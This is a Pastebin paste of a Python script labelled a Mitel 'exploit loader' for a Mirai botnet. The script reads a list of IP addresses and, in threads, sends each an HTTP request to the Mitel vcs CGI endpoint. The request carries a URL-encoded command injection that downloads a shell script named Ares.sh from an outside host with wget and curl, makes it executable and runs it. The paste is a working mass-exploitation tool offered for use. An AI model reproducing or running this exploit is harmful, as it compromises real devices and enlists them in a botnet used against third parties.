Advertisement
xB4ckdoorREAL

[PR10-14 EXPLOIT LOADER] [RCE] [MIRAI]

Dec 12th, 2019
453
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.15 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # PR10 - MITEL Exploit loader made by B4CKDOOR #
  4. # B4CKDOORARCHIVE.HOST - https://discord.gg/MVktpTW #
  5.  
  6. import threading, random, socket, time, sys, requests, re, os
  7. from threading import Thread
  8. from time import sleep
  9. import requests
  10. from requests.auth import HTTPDigestAuth
  11. from decimal import *
  12.  
  13. if len(sys.argv) < 2:
  14.     print "\033[37mUsage: python "+sys.argv[0]+" <list>\033[37m"
  15.     sys.exit()
  16.  
  17. vulns = open(sys.argv[1], "r").readlines()
  18.  
  19. class send_payload(threading.Thread):
  20.     def __init__ (self, ip):
  21.         threading.Thread.__init__(self)
  22.         self.ip = str(ip).rstrip('\n')
  23.     def run(self):
  24.         try:
  25.             url = "http://" + self.ip + "/awcuser/cgi-bin/vcs?xsl=/vcs/vcs_home.xsl%26wget%20http%3A%2F%2F1.3.3.7%2FAres.sh%3B%20curl%20-O%20http%3A%2F%2F1.3.3.7%2FAres.sh%3B%20chmod%20%2Bx%20Ares.sh%3B%20sh%20Ares.sh%22%26" # DO NOT FUCK THE PAYLOAD !!!!
  26.             requests.get(url, timeout=3)
  27.             print "[PR-10] Loading: %s"%(self.ip)
  28.         except:
  29.             pass
  30.  
  31. for IP in vulns:
  32.     try:
  33.         ip = "".join(IP)
  34.         ip = ip.replace("\n", "")
  35.         t = send_payload(ip)
  36.         t.start()
  37.         time.sleep(0.03)
  38.     except:
  39.         pass #CODED BY B4CKDOOR
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement